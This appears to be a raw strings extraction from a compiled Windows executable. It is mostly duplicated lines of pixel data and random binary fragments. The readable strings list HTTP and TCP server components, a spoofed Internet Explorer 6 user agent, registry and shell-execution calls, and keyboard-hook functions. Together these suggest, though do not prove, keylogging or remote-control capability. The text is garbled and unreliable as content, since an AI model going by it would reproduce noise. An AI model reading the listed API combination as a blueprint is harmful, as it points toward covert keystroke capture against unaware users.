3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3UC2UC2UC2UC2UC2TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3WF3WF3WF3WF3WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5XI6XI6VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4YH5YH5XG4XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]J5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^L5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^I3^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3_K2`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3aM4aM4aM4aM4aM4aM4aM4aM4cM4cM4cM4cM4cM4
ZM?OA.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2SC3RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB1RB1SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2RB1SC2RB1RB1QA0RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2TD3TD3TD3TD3TD3TD3TD3TD3TD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3UC2UC2UC2UC2UC2TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3WF3WF3WF3WF3WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5XI6XI6VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4YH5YH5XG4XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]J5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^L5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^I3^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3_K2`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3aM4aM4aM4aM4aM4aM4aM4aM4cM4cM4cM4cM4cM4
O?.N@.O@0N@.N?/N@.M>.M>.YJ:
O?.N@.O@0N@.N?/N@.M>.M>.YJ:
~J=/J=/J=/J=/J=/K>0J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/L=-L=-L=-L=-L>,L>,L=-L=-L=-L=-L=-M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0N@.N@.N@.N@.N@.N@.N@.N@.N@.N@.N@.N@.N@.N@.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/N@.N@.N@.N@.N@.N@.N@.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2TE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XG4WF3WF3YE3XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1[F1]F0]F0
~J=/J=/J=/J=/J=/K>0J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/L=-L=-L=-L=-L>,L>,L=-L=-L=-L=-L=-M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0N@.N@.N@.N@.N@.N@.N@.N@.N@.N@.N@.N@.N@.N@.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/N@.N@.N@.N@.N@.N@.N@.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2TE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XG4WF3WF3YE3XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1[F1]F0]F0
zui_E8*E8*E8*E8*E8*F9 E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,E:,E:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:*H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; I.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/RA.RA.R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1SA0SA0SA0SA0SA0SA0SA0SA0R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/P@/P@/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/QB/QB/QB/QB/QB/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.PA.PA.
zui_E8*E8*E8*E8*E8*F9 E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,E:,E:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:*H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; I.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/RA.RA.R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1SA0SA0SA0SA0SA0SA0SA0SA0R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/P@/P@/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/QB/QB/QB/QB/QB/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.PA.PA.
=5(;4%=5(=4'
=5(;4%=5(=4'
;2(:1':1'
;2(:1':1'
KWindows
KWindows
eEWB.IEConst
eEWB.IEConst
0IdHTTPHeaderInfo
0IdHTTPHeaderInfo
IdTCPServer
IdTCPServer
IdTCPStream
IdTCPStream
Font.Charset
Font.Charset
Font.Color
Font.Color
Font.Height
Font.Height
Font.Name
Font.Name
Font.Style
Font.Style
PrintOptions.HTMLHeader.Strings
PrintOptions.HTMLHeader.Strings
PrintOptions.Orientation
PrintOptions.Orientation
ProxyParams.BasicAuthentication
ProxyParams.BasicAuthentication
ProxyParams.ProxyPort
ProxyParams.ProxyPort
Request.ContentLength
Request.ContentLength
Request.ContentRangeEnd
Request.ContentRangeEnd
Request.ContentRangeStart
Request.ContentRangeStart
Request.ContentType
Request.ContentType
Request.Accept
Request.Accept
Request.BasicAuthentication
Request.BasicAuthentication
Request.UserAgent
Request.UserAgent
7Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
7Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTPOptions
HTTPOptions
GetCPInfo
GetCPInfo
XTP8h%C
XTP8h%C
3F%u`r
3F%u`r
The procedure entry point %s could not be located in the dynamic link library %s
The procedure entry point %s could not be located in the dynamic link library %s
GetKeyNameTextA
GetKeyNameTextA
GetKeyState
GetKeyState
SHFileOperationA
SHFileOperationA
UnhookWindowsHookEx
UnhookWindowsHookEx
G({.NJ:
G({.NJ:
shell32.dll
shell32.dll
Dadvapi32.dll
Dadvapi32.dll
CreateIoCompletionPort
CreateIoCompletionPort
EnumWindows
EnumWindows
RegCreateKeyExA
RegCreateKeyExA
wininet.dll
wininet.dll
gdi32.dll
gdi32.dll
RegEnumKeyExA
RegEnumKeyExA
@8\3@(&@
@8\3@(&@
m.KS!?IZ
m.KS!?IZ
.IjS0Z
.IjS0Z
4.Yz8
4.Yz8
N.Px
N.Px
%F
%F
}H.wN
}H.wN
?.MLW
?.MLW
ShellExecuteA
ShellExecuteA
SetViewportOrgEx
SetViewportOrgEx
GetKeyboardState
GetKeyboardState
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetWindowsDirectoryA
GetWindowsDirectoryA
version.dll
version.dll
RegDeleteKeyA
RegDeleteKeyA
SetWindowsHookExA
SetWindowsHookExA
RegCloseKey
RegCloseKey
|N.Uip
|N.Uip
GetKeyboardType
GetKeyboardType
.HX2'4
.HX2'4
J['%Y%c%]"
J['%Y%c%]"
.Jz\
.Jz\
RP.Ji|
RP.Ji|
.VGZZQ?XD 9
.VGZZQ?XD 9
bk.Zi7
bk.Zi7
6O.PJF>B&
6O.PJF>B&
.NV'Pg
.NV'Pg
E.PO*J
E.PO*J
b?.RjB
b?.RjB
).RJ$7
).RJ$7
\.dfXX
\.dfXX
HCtl.Lj
HCtl.Lj
.VN&5
.VN&5
SRF98.XORO
SRF98.XORO
<.cd:>
<.cd:>
~z%D&
~z%D&
jWyfTP
jWyfTP
)N.QuHG`
)N.QuHG`
vXp.aGB
vXp.aGB
.goU[
.goU[
dS.IZf\6V
dS.IZf\6V
j.QU@'
j.QU@'
C.XV$
C.XV$
tCP z
tCP z
=H.Dt[
=H.Dt[
B3uDpZ
B3uDpZ
.Pv
.Pv
.XD%O86
.XD%O86
*?9[_'^-.
*?9[_'^-.
U^.bfD
U^.bfD
Vj.eJd
Vj.eJd
&6%X"
&6%X"
%f z'W
%f z'W
T.cBe
T.cBe
@Z.CB
@Z.CB
j.YW MYd
j.YW MYd
9.Dy7
9.Dy7
5J{"WD%S#^
5J{"WD%S#^
.ja*3
.ja*3
$.GE(X
$.GE(X
"7b%D
"7b%D
\ @%X
\ @%X
..Ld?/o|S[
..Ld?/o|S[
X.TJH
X.TJH
ôpQ
ôpQ
)%x5a
)%x5a
~M%x8u*
~M%x8u*
L.HJ7?
L.HJ7?
.ALh&
.ALh&
.DPs_
.DPs_
_.PPw
_.PPw
z'.ANC
z'.ANC
nX.oF
nX.oF
L.JOS
L.JOS
..JG^
..JG^
B.XG6
B.XG6
".LGR
".LGR
G.Xfg
G.Xfg
..VG8
..VG8
.LG>S
.LG>S
D..GD
D..GD
F.DOP
F.DOP
.ZO"R
.ZO"R
.BO2R
.BO2R
^z.PG
^z.PG
5.TO RoZR
5.TO RoZR
F.PdYXn
F.PdYXn
%fT@sd
%fT@sd
.PdYX/
.PdYX/
%fV@sd
%fV@sd
=%X,7
=%X,7
FÃE
FÃE
[.FGD
[.FGD
X.VO/
